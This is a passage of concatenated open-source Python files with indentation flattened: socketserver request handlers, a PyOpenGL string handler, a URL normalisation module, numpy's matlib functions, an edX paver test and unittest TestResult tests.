self.active_children.remove(pid)
# XXX: This loop runs more system calls than it ought
# to. There should be a way to put the active_children into a
# process group and then use os.waitpid(-pgid) to wait for any
# of that set, but I couldn't find a way to allocate pgids
# that couldn't collide.
for child in self.active_children:
try:
pid, status = os.waitpid(child, os.WNOHANG)
except os.error:
pid = None
if not pid: continue
try:
self.active_children.remove(pid)
except ValueError as e:
raise ValueError('%s. x=%d and list=%r' % (e.message, pid,
self.active_children))
def handle_timeout(self):
"""Wait for zombies after self.timeout seconds of inactivity.
May be extended, do not override.
"""
self.collect_children()
def service_actions(self):
"""Collect the zombie child processes regularly in the ForkingMixIn.
service_actions is called in the BaseServer's serve_forver loop.
"""
self.collect_children()
def process_request(self, request, client_address):
"""Fork a new subprocess to process the request."""
pid = os.fork()
if pid:
# Parent process
if self.active_children is None:
self.active_children = []
self.active_children.append(pid)
self.close_request(request)
return
else:
# Child process.
# This must never return, hence os._exit()!
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
os._exit(0)
except:
try:
self.handle_error(request, client_address)
self.shutdown_request(request)
finally:
os._exit(1)
class ThreadingMixIn:
"""Mix-in class to handle each request in a new thread."""
# Decides how threads will act upon termination of the
# main process
daemon_threads = False
def process_request_thread(self, request, client_address):
"""Same as in BaseServer but as a thread.
In addition, exception handling is done here.
"""
try:
self.finish_request(request, client_address)
self.shutdown_request(request)
except:
self.handle_error(request, client_address)
self.shutdown_request(request)
def process_request(self, request, client_address):
"""Start a new thread to process the request."""
t = threading.Thread(target = self.process_request_thread,
args = (request, client_address))
t.daemon = self.daemon_threads
t.start()
class ForkingUDPServer(ForkingMixIn, UDPServer): pass
class ForkingTCPServer(ForkingMixIn, TCPServer): pass
class ThreadingUDPServer(ThreadingMixIn, UDPServer): pass
class ThreadingTCPServer(ThreadingMixIn, TCPServer): pass
if hasattr(socket, 'AF_UNIX'):
class UnixStreamServer(TCPServer):
address_family = socket.AF_UNIX
class UnixDatagramServer(UDPServer):
address_family = socket.AF_UNIX
class ThreadingUnixStreamServer(ThreadingMixIn, UnixStreamServer): pass
class ThreadingUnixDatagramServer(ThreadingMixIn, UnixDatagramServer): pass
class BaseRequestHandler:
"""Base class for request handler classes.
This class is instantiated for each request to be handled. The
constructor sets the instance variables request, client_address
and server, and then calls the handle() method. To implement a
specific service, all you need to do is to derive a class which
defines a handle() method.
The handle() method can find the request as self.request, the
client address as self.client_address, and the server (in case it
needs access to per-server information) as self.server. Since a
separate instance is created for each request, the handle() method
can define arbitrary other instance variariables.
"""
def __init__(self, request, client_address, server):
self.request = request
self.client_address = client_address
self.server = server
self.setup()
try:
self.handle()
finally:
self.finish()
def setup(self):
pass
def handle(self):
pass
def finish(self):
pass
# The following two classes make it possible to use the same service
# class for stream or datagram servers.
# Each class sets up these instance variables:
# - rfile: a file object from which receives the request is read
# - wfile: a file object to which the reply is written
# When the handle() method returns, wfile is flushed properly
class StreamRequestHandler(BaseRequestHandler):
"""Define self.rfile and self.wfile for stream sockets."""
# Default buffer sizes for rfile, wfile.
# We default rfile to buffered because otherwise it could be
# really slow for large data (a getc() call per byte); we make
# wfile unbuffered because (a) often after a write() we want to
# read and we need to flush the line; (b) big writes to unbuffered
# files are typically optimized by stdio even when big reads
# aren't.
rbufsize = -1
wbufsize = 0
# A timeout to apply to the request socket, if not None.
timeout = None
# Disable nagle algorithm for this socket, if True.
# Use only when wbufsize != 0, to avoid small packets.
disable_nagle_algorithm = False
def setup(self):
self.connection = self.request
if self.timeout is not None:
self.connection.settimeout(self.timeout)
if self.disable_nagle_algorithm:
self.connection.setsockopt(socket.IPPROTO_TCP,
socket.TCP_NODELAY, True)
self.rfile = self.connection.makefile('rb', self.rbufsize)
self.wfile = self.connection.makefile('wb', self.wbufsize)
def finish(self):
if not self.wfile.closed:
try:
self.wfile.flush()
except socket.error:
# An final socket error may have occurred here, such as
# the local error ECONNABORTED.
pass
self.wfile.close()
self.rfile.close()
class DatagramRequestHandler(BaseRequestHandler):
# XXX Regrettably, I cannot get this working on Linux;
# s.recvfrom() doesn't return a meaningful client address.
"""Define self.rfile and self.wfile for datagram sockets."""
def setup(self):
from io import BytesIO
self.packet, self.socket = self.request
self.rfile = BytesIO(self.packet)
self.wfile = BytesIO()
def finish(self):
self.socket.sendto(self.wfile.getvalue(), self.client_address)
| mit |
tinkerinestudio/Tinkerine-Suite | TinkerineSuite/python/Lib/OpenGL/arrays/strings.py | 2 | 3076 | """String-array-handling code for PyOpenGL
"""
#from OpenGL.arrays._strings import dataPointer as old
from OpenGL import constants
from OpenGL.arrays import formathandler
import ctypes
psas = ctypes.pythonapi.PyString_AsString
# it's a c_char_p, but if we use that then the code will
# attempt to use null-terminated versus arbitrarily sized
psas.restype = ctypes.c_size_t
#psas.restype = ctypes.c_char_p
def dataPointer( value, typeCode=None ):
new = psas( ctypes.py_object(value) )
return new
class StringHandler( formathandler.FormatHandler ):
"""String-specific data-type handler for OpenGL"""
HANDLED_TYPES = (str, )
@classmethod
def from_param( cls, value, typeCode=None ):
return ctypes.c_void_p( dataPointer( value ) )
dataPointer = staticmethod( dataPointer )
def zeros( self, dims, typeCode=None ):
"""Currently don't allow strings as output types!"""
raise NotImplemented( """Don't currently support strings as output arrays""" )
def ones( self, dims, typeCode=None ):
"""Currently don't allow strings as output types!"""
raise NotImplemented( """Don't currently support strings as output arrays""" )
def arrayToGLType( self, value ):
"""Given a value, guess OpenGL type of the corresponding pointer"""
raise NotImplemented( """Can't guess data-type from a string-type argument""" )
def arraySize( self, value, typeCode = None ):
"""Given a data-value, calculate ravelled size for the array"""
# need to get bits-per-element...
byteCount = BYTE_SIZES[ typeCode ]
return len(value)//byteCount
def arrayByteCount( self, value, typeCode = None ):
"""Given a data-value, calculate number of bytes required to represent"""
return len(value)
def asArray( self, value, typeCode=None ):
"""Convert given value to an array value of given typeCode"""
if isinstance( value, str ):
return value
elif hasattr( value, 'tostring' ):
return value.tostring()
elif hasattr( value, 'raw' ):
return value.raw
# could convert types to string here, but we're not registered for
# anything save string types...
raise TypeError( """String handler got non-string object: %r"""%(type(value)))
def dimensions( self, value, typeCode=None ):
"""Determine dimensions of the passed array value (if possible)"""
raise TypeError(
"""Cannot calculate dimensions for a String data-type"""
)
BYTE_SIZES = {
constants.GL_DOUBLE: ctypes.sizeof( constants.GLdouble ),
constants.GL_FLOAT: ctypes.sizeof( constants.GLfloat ),
constants.GL_INT: ctypes.sizeof( constants.GLint ),
constants.GL_SHORT: ctypes.sizeof( constants.GLshort ),
constants.GL_UNSIGNED_BYTE: ctypes.sizeof( constants.GLubyte ),
constants.GL_UNSIGNED_SHORT: ctypes.sizeof( constants.GLshort ),
constants.GL_BYTE: ctypes.sizeof( constants.GLbyte ),
constants.GL_UNSIGNED_INT: ctypes.sizeof( constants.GLuint ),
} | agpl-3.0 |
janastu/swtstore | swtstore/classes/utils/urlnorm.py | 2 | 7460 | # urlnorm.py - Normalize URLs
# Copyright (C) 2010 Kurt McKee <contactme@kurtmckee.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
__author__ = "Kurt McKee <contactme@kurtmckee.org>"
import re
import urllib
import urlparse
DEFAULT_PORTS = {
'http': u'80',
'https': u'443',
}
NETLOC = re.compile("""
^
(?:
(?P<username>[^:@]+)?
(?:
:
(?P<password>[^@]*)
)?
@
)?
(?P<hostname>[^:]+)
(?:
:
(?P<port>[0-9]*)
)?
$
""", re.VERBOSE,
)
PERCENT_ENCODING = re.compile("%([0-9a-f]{2})", re.IGNORECASE)
UNACCEPTABLE_QUERY_CHARS = re.compile("([^A-Za-z0-9_.~/-])")
# http://www.pc-help.org/obscure.htm
# http://www.securelist.com/en/blog/148/
# Translate the IP address from octal, decimal, and hex
# into a base 10 quadruple octet (like 127.0.0.1)
NUMERIC_IP = re.compile("""
^
(?:
(?P<o0>(?:[0-9]+)|(?:0x[0-9a-f]+))
[.]
)?
(?:
(?P<o1>(?:[0-9]+)|(?:0x[0-9a-f]+))
[.]
)?
(?:
(?P<o2>(?:[0-9]+)|(?:0x[0-9a-f]+))
[.]
)?
(?P<o3>(?:[0-9]+)|(?:0x[0-9a-f]+))
$
""", re.VERBOSE | re.IGNORECASE
)
_pre_plugins = []
_post_plugins = []
def register_pre_plugin(fn):
_pre_plugins.append(fn)
def register_post_plugin(fn):
_post_plugins.append(fn)
def urlnorm(url, base=None):
newurl = url.strip()
newurl = ''.join((v for u in newurl.split('\n') for v in u.split('\r')))
if newurl.lower().startswith('feed:'):
newurl = newurl[5:]
if base is not None:
newurl = urlparse.urljoin(base.strip(), newurl)
for fn in _pre_plugins:
newurl = fn(newurl)
newurl = _normalize_percent_encoding(newurl)
parts = _urlparse(newurl)
if parts is None:
return url
parts.update(_split_netloc(parts['netloc']))
parts['scheme'] = _normalize_scheme(parts['scheme'])
parts['port'] = _normalize_port(parts['port'], parts['scheme'])
parts['path'] = _normalize_path(parts['path'])
parts['hostname'] = _normalize_hostname(parts.get('hostname', ''))
parts['query'] = _split_query(parts['query'])
for fn in _post_plugins:
parts.update(fn(parts))
return _join_parts(parts)
def _urlparse(url):
parts = dict(zip(('scheme', 'netloc', 'path', 'params', 'query', 'fragment'),
urlparse.urlparse(url)
))
if (not parts['scheme'] and not parts['netloc']) or \
(
not parts['netloc'] and
parts['path'] and
parts['path'][0] in map(str, range(10)) and
url.startswith('%s:%s' % (parts['scheme'], parts['path']))
):
# url may not have included a scheme, like 'domain.example'
# url may have been in the form 'domain.example:8080'
parts = dict(zip(('scheme', 'netloc', 'path', 'params', 'query', 'fragment'),
urlparse.urlparse('http://%s' % url)
))
elif parts['scheme'].lower() not in ('http', 'https'):
return None
return parts
def _join_parts(parts):
url = '%s://' % parts['scheme']
if parts['username']:
url += parts['username']
if parts['password']:
url += ':%s' % parts['password']
url += '@'
url += parts['hostname']
if parts['port']:
url += ':%s' % parts['port']
url += parts['path']
if parts['params']:
url += ';%s' % parts['params']
if parts['query']:
url += '?%s' % _join_query(parts['query'])
if parts['fragment']:
url += '#%s' % parts['fragment']
return url
def _split_netloc(netloc):
parts_netloc = NETLOC.match(netloc)
if parts_netloc is not None:
return parts_netloc.groupdict()
return {'username': '', 'password': '', 'hostname': '', 'port': ''}
def _normalize_scheme(scheme):
return scheme.lower() or 'http'
def _normalize_port(port, scheme):
if scheme in DEFAULT_PORTS and DEFAULT_PORTS[scheme] == port:
return ''
return port
def _normalize_percent_encoding(txt):
unreserved = u'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_.~'
def repl(hexpair):
if unichr(int(hexpair.group(1), 16)) in unreserved:
return unichr(int(hexpair.group(1), 16))
return u'%%%s' % hexpair.group(1).upper()
return re.sub(PERCENT_ENCODING, repl, txt)
def _normalize_hostname(hostname):
hostname = hostname.lower()
if hostname.endswith('.'):
hostname = hostname[:-1]
ip = NUMERIC_IP.match(hostname)
if ip is not None:
ip = filter(None, ip.groups())
decimal_ip = 0
for i in range(len(ip)):
base = (10, 8, 16)[(ip[i][0:1] == '0') + (ip[i][1:2] == 'x')]
decimal_ip += (
(long(ip[i] or '0', base) &
(256**[1, 4-i][len(ip)==i+1]-1)) <<
(8*[3-i, 0][len(ip)==i+1])
)
new_ip = '.'.join([unicode((decimal_ip >> (8*octet)) & 255) for octet in (3, 2, 1, 0)])
hostname = new_ip
return hostname
def _normalize_path(path):
path = path.split('/')
endslash = False
if path[-1] == '':
endslash = True
path = filter(None, path)
pos = 0
for i in range(len(path)):
if path[i] == '.':
path[i] = None
elif path[i] == '..':
path[pos] = None
if pos > 0:
pos -= 1
path[i] = None
elif path[i]:
path[pos] = path[i]
if pos < i:
path[i] = None
pos += 1
path.insert(0, '')
if endslash:
path.append('')
return '/'.join(filter(lambda x: x is not None, path)) or '/'
def _split_query(query):
# The following code's basic logic was found in the Python 2.6
# urlparse library, but was modified due to differing needs
ret = {}
queries = [j for i in query.split('&') for j in i.split(';')]
if queries == ['']:
return ret
for q in queries:
nv = q.split('=', 1)
if len(nv) == 1:
# Differentiate between `?n=` and ?n`
nv.append(None)
ret.setdefault(nv[0], []).append(nv[1])
return ret
def _join_query(qdict):
def replace(s):
return u'%%%s' % hex(ord(s.group(1)))[2:].upper()
ret = ''
for k in sorted(qdict.keys()):
for v in sorted(qdict[k]):
if v is None:
ret += '&%s' % (re.sub(UNACCEPTABLE_QUERY_CHARS, replace, k),)
elif not v:
ret += '&%s=' % (re.sub(UNACCEPTABLE_QUERY_CHARS, replace, k),)
else:
ret += '&%s=%s' % (re.sub(UNACCEPTABLE_QUERY_CHARS, replace, k),
re.sub(UNACCEPTABLE_QUERY_CHARS, replace, v)
)
return ret[1:]
| bsd-2-clause |
solarjoe/numpy | numpy/matlib.py | 161 | 9584 | from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.matrixlib.defmatrix import matrix, asmatrix
# need * as we're copying the numpy namespace
from numpy import *
__version__ = np.__version__
__all__ = np.__all__[:] # copy numpy namespace
__all__ += ['rand', 'randn', 'repmat']
def empty(shape, dtype=None, order='C'):
"""Return a new matrix of given shape and type, without initializing entries.
Parameters
----------
shape : int or tuple of int
Shape of the empty matrix.
dtype : data-type, optional
Desired output data-type.
order : {'C', 'F'}, optional
Whether to store multi-dimensional data in row-major
(C-style) or column-major (Fortran-style) order in
memory.
See Also
--------
empty_like, zeros
Notes
-----
`empty`, unlike `zeros`, does not set the matrix values to zero,
and may therefore be marginally faster. On the other hand, it requires
the user to manually set all the values in the array, and should be
used with caution.
Examples
--------
>>> import numpy.matlib
>>> np.matlib.empty((2, 2)) # filled with random data
matrix([[ 6.76425276e-320, 9.79033856e-307],
[ 7.39337286e-309, 3.22135945e-309]]) #random
>>> np.matlib.empty((2, 2), dtype=int)
matrix([[ 6600475, 0],
[ 6586976, 22740995]]) #random
"""
return ndarray.__new__(matrix, shape, dtype, order=order)
def ones(shape, dtype=None, order='C'):
"""
Matrix of ones.
Return a matrix of given shape and type, filled with ones.
Parameters
----------
shape : {sequence of ints, int}
Shape of the matrix
dtype : data-type, optional
The desired data-type for the matrix, default is np.float64.
order : {'C', 'F'}, optional
Whether to store matrix in C- or Fortran-contiguous order,
default is 'C'.
Returns
-------
out : matrix
Matrix of ones of given shape, dtype, and order.
See Also
--------
ones : Array of ones.
matlib.zeros : Zero matrix.
Notes
-----
If `shape` has length one i.e. ``(N,)``, or is a scalar ``N``,
`out` becomes a single row matrix of shape ``(1,N)``.
Examples
--------
>>> np.matlib.ones((2,3))
matrix([[ 1., 1., 1.],
[ 1., 1., 1.]])
>>> np.matlib.ones(2)
matrix([[ 1., 1.]])
"""
a = ndarray.__new__(matrix, shape, dtype, order=order)
a.fill(1)
return a
def zeros(shape, dtype=None, order='C'):
"""
Return a matrix of given shape and type, filled with zeros.
Parameters
----------
shape : int or sequence of ints
Shape of the matrix
dtype : data-type, optional
The desired data-type for the matrix, default is float.
order : {'C', 'F'}, optional
Whether to store the result in C- or Fortran-contiguous order,
default is 'C'.
Returns
-------
out : matrix
Zero matrix of given shape, dtype, and order.
See Also
--------
numpy.zeros : Equivalent array function.
matlib.ones : Return a matrix of ones.
Notes
-----
If `shape` has length one i.e. ``(N,)``, or is a scalar ``N``,
`out` becomes a single row matrix of shape ``(1,N)``.
Examples
--------
>>> import numpy.matlib
>>> np.matlib.zeros((2, 3))
matrix([[ 0., 0., 0.],
[ 0., 0., 0.]])
>>> np.matlib.zeros(2)
matrix([[ 0., 0.]])
"""
a = ndarray.__new__(matrix, shape, dtype, order=order)
a.fill(0)
return a
def identity(n,dtype=None):
"""
Returns the square identity matrix of given size.
Parameters
----------
n : int
Size of the returned identity matrix.
dtype : data-type, optional
Data-type of the output. Defaults to ``float``.
Returns
-------
out : matrix
`n` x `n` matrix with its main diagonal set to one,
and all other elements zero.
See Also
--------
numpy.identity : Equivalent array function.
matlib.eye : More general matrix identity function.
Examples
--------
>>> import numpy.matlib
>>> np.matlib.identity(3, dtype=int)
matrix([[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
"""
a = array([1]+n*[0], dtype=dtype)
b = empty((n, n), dtype=dtype)
b.flat = a
return b
def eye(n,M=None, k=0, dtype=float):
"""
Return a matrix with ones on the diagonal and zeros elsewhere.
Parameters
----------
n : int
Number of rows in the output.
M : int, optional
Number of columns in the output, defaults to `n`.
k : int, optional
Index of the diagonal: 0 refers to the main diagonal,
a positive value refers to an upper diagonal,
and a negative value to a lower diagonal.
dtype : dtype, optional
Data-type of the returned matrix.
Returns
-------
I : matrix
A `n` x `M` matrix where all elements are equal to zero,
except for the `k`-th diagonal, whose values are equal to one.
See Also
--------
numpy.eye : Equivalent array function.
identity : Square identity matrix.
Examples
--------
>>> import numpy.matlib
>>> np.matlib.eye(3, k=1, dtype=float)
matrix([[ 0., 1., 0.],
[ 0., 0., 1.],
[ 0., 0., 0.]])
"""
return asmatrix(np.eye(n, M, k, dtype))
def rand(*args):
"""
Return a matrix of random values with given shape.
Create a matrix of the given shape and propagate it with
random samples from a uniform distribution over ``[0, 1)``.
Parameters
----------
\\*args : Arguments
Shape of the output.
If given as N integers, each integer specifies the size of one
dimension.
If given as a tuple, this tuple gives the complete shape.
Returns
-------
out : ndarray
The matrix of random values with shape given by `\\*args`.
See Also
--------
randn, numpy.random.rand
Examples
--------
>>> import numpy.matlib
>>> np.matlib.rand(2, 3)
matrix([[ 0.68340382, 0.67926887, 0.83271405],
[ 0.00793551, 0.20468222, 0.95253525]]) #random
>>> np.matlib.rand((2, 3))
matrix([[ 0.84682055, 0.73626594, 0.11308016],
[ 0.85429008, 0.3294825 , 0.89139555]]) #random
If the first argument is a tuple, other arguments are ignored:
>>> np.matlib.rand((2, 3), 4)
matrix([[ 0.46898646, 0.15163588, 0.95188261],
[ 0.59208621, 0.09561818, 0.00583606]]) #random
"""
if isinstance(args[0], tuple):
args = args[0]
return asmatrix(np.random.rand(*args))
def randn(*args):
"""
Return a random matrix with data from the "standard normal" distribution.
`randn` generates a matrix filled with random floats sampled from a
univariate "normal" (Gaussian) distribution of mean 0 and variance 1.
Parameters
----------
\\*args : Arguments
Shape of the output.
If given as N integers, each integer specifies the size of one
dimension. If given as a tuple, this tuple gives the complete shape.
Returns
-------
Z : matrix of floats
A matrix of floating-point samples drawn from the standard normal
distribution.
See Also
--------
rand, random.randn
Notes
-----
For random samples from :math:`N(\\mu, \\sigma^2)`, use:
``sigma * np.matlib.randn(...) + mu``
Examples
--------
>>> import numpy.matlib
>>> np.matlib.randn(1)
matrix([[-0.09542833]]) #random
>>> np.matlib.randn(1, 2, 3)
matrix([[ 0.16198284, 0.0194571 , 0.18312985],
[-0.7509172 , 1.61055 , 0.45298599]]) #random
Two-by-four matrix of samples from :math:`N(3, 6.25)`:
>>> 2.5 * np.matlib.randn((2, 4)) + 3
matrix([[ 4.74085004, 8.89381862, 4.09042411, 4.83721922],
[ 7.52373709, 5.07933944, -2.64043543, 0.45610557]]) #random
"""
if isinstance(args[0], tuple):
args = args[0]
return asmatrix(np.random.randn(*args))
def repmat(a, m, n):
"""
Repeat a 0-D to 2-D array or matrix MxN times.
Parameters
----------
a : array_like
The array or matrix to be repeated.
m, n : int
The number of times `a` is repeated along the first and second axes.
Returns
-------
out : ndarray
The result of repeating `a`.
Examples
--------
>>> import numpy.matlib
>>> a0 = np.array(1)
>>> np.matlib.repmat(a0, 2, 3)
array([[1, 1, 1],
[1, 1, 1]])
>>> a1 = np.arange(4)
>>> np.matlib.repmat(a1, 2, 2)
array([[0, 1, 2, 3, 0, 1, 2, 3],
[0, 1, 2, 3, 0, 1, 2, 3]])
>>> a2 = np.asmatrix(np.arange(6).reshape(2, 3))
>>> np.matlib.repmat(a2, 2, 3)
matrix([[0, 1, 2, 0, 1, 2, 0, 1, 2],
[3, 4, 5, 3, 4, 5, 3, 4, 5],
[0, 1, 2, 0, 1, 2, 0, 1, 2],
[3, 4, 5, 3, 4, 5, 3, 4, 5]])
"""
a = asanyarray(a)
ndim = a.ndim
if ndim == 0:
origrows, origcols = (1, 1)
elif ndim == 1:
origrows, origcols = (1, a.shape[0])
else:
origrows, origcols = a.shape
rows = origrows * m
cols = origcols * n
c = a.reshape(1, a.size).repeat(m, 0).reshape(rows, origcols).repeat(n, 0)
return c.reshape(rows, cols)
| bsd-3-clause |
eestay/edx-platform | pavelib/paver_tests/test_prereqs.py | 99 | 1862 | import os
import unittest
from pavelib.prereqs import no_prereq_install
class TestPaverPrereqInstall(unittest.TestCase):
"""
Test the status of the NO_PREREQ_INSTALL variable, its presence and how
paver handles it.
"""
def check_val(self, set_val, expected_val):
"""
Verify that setting the variable to a certain value returns
the expected boolean for it.
As environment variables are only stored as strings, we have to cast
whatever it's set at to a boolean that does not violate expectations.
"""
_orig_environ = dict(os.environ)
os.environ['NO_PREREQ_INSTALL'] = set_val
self.assertEqual(
no_prereq_install(),
expected_val,
'NO_PREREQ_INSTALL is set to {}, but we read it as {}'.format(
set_val, expected_val),
)
# Reset Environment back to original state
os.environ.clear()
os.environ.update(_orig_environ)
def test_no_prereq_install_true(self):
"""
Ensure that 'true' will be True.
"""
self.check_val('true', True)
def test_no_prereq_install_false(self):
"""
Ensure that 'false' will be False.
"""
self.check_val('false', False)
def test_no_prereq_install_True(self):
"""
Ensure that 'True' will be True.
"""
self.check_val('True', True)
def test_no_prereq_install_False(self):
"""
Ensure that 'False' will be False.
"""
self.check_val('False', False)
def test_no_prereq_install_0(self):
"""
Ensure that '0' will be False.
"""
self.check_val('0', False)
def test_no_prereq_install_1(self):
"""
Ensure that '1' will be True.
"""
self.check_val('1', True)
| agpl-3.0 |
eckucukoglu/arm-linux-gnueabihf | lib/python2.7/unittest/test/test_result.py | 104 | 19064 | import sys
import textwrap
from StringIO import StringIO
from test import test_support
import traceback
import unittest
class Test_TestResult(unittest.TestCase):
# Note: there are not separate tests for TestResult.wasSuccessful(),
# TestResult.errors, TestResult.failures, TestResult.testsRun or
# TestResult.shouldStop because these only have meaning in terms of
# other TestResult methods.
#
# Accordingly, tests for the aforenamed attributes are incorporated
# in with the tests for the defining methods.
################################################################
def test_init(self):
result = unittest.TestResult()
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 0)
self.assertEqual(result.shouldStop, False)
self.assertIsNone(result._stdout_buffer)
self.assertIsNone(result._stderr_buffer)
# "This method can be called to signal that the set of tests being
# run should be aborted by setting the TestResult's shouldStop
# attribute to True."
def test_stop(self):
result = unittest.TestResult()
result.stop()
self.assertEqual(result.shouldStop, True)
# "Called when the test case test is about to be run. The default
# implementation simply increments the instance's testsRun counter."
def test_startTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# "Called after the test case test has been executed, regardless of
# the outcome. The default implementation does nothing."
def test_stopTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# Same tests as above; make sure nothing has changed
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "Called before and after tests are run. The default implementation does nothing."
def test_startTestRun_stopTestRun(self):
result = unittest.TestResult()
result.startTestRun()
result.stopTestRun()
# "addSuccess(test)"
# ...
# "Called when the test case test succeeds"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addSuccess(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "addFailure(test, err)"
# ...
# "Called when the test case test signals a failure. err is a tuple of
# the form returned by sys.exc_info(): (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addFailure(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
test.fail("foo")
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addFailure(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.failures[0]
self.assertTrue(test_case is test)
self.assertIsInstance(formatted_exc, str)
# "addError(test, err)"
# ...
# "Called when the test case test raises an unexpected exception err
# is a tuple of the form returned by sys.exc_info():
# (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addError(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
raise TypeError()
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addError(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertTrue(test_case is test)
self.assertIsInstance(formatted_exc, str)
def testGetDescriptionWithoutDocstring(self):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
'testGetDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult)')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
def testStackFrameTrimming(self):
class Frame(object):
class tb_frame(object):
f_globals = {}
result = unittest.TestResult()
self.assertFalse(result._is_relevant_tb_level(Frame))
Frame.tb_frame.f_globals['__unittest'] = True
self.assertTrue(result._is_relevant_tb_level(Frame))
def testFailFast(self):
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addError(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addFailure(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addUnexpectedSuccess(None)
self.assertTrue(result.shouldStop)
def testFailFastSetByRunner(self):
runner = unittest.TextTestRunner(stream=StringIO(), failfast=True)
def test(result):
self.assertTrue(result.failfast)
runner.run(test)
classDict = dict(unittest.TestResult.__dict__)
for m in ('addSkip', 'addExpectedFailure', 'addUnexpectedSuccess',
'__init__'):
del classDict[m]
def __init__(self, stream=None, descriptions=None, verbosity=None):
self.failures = []
self.errors = []
self.testsRun = 0
self.shouldStop = False
self.buffer = False
classDict['__init__'] = __init__
OldResult = type('OldResult', (object,), classDict)
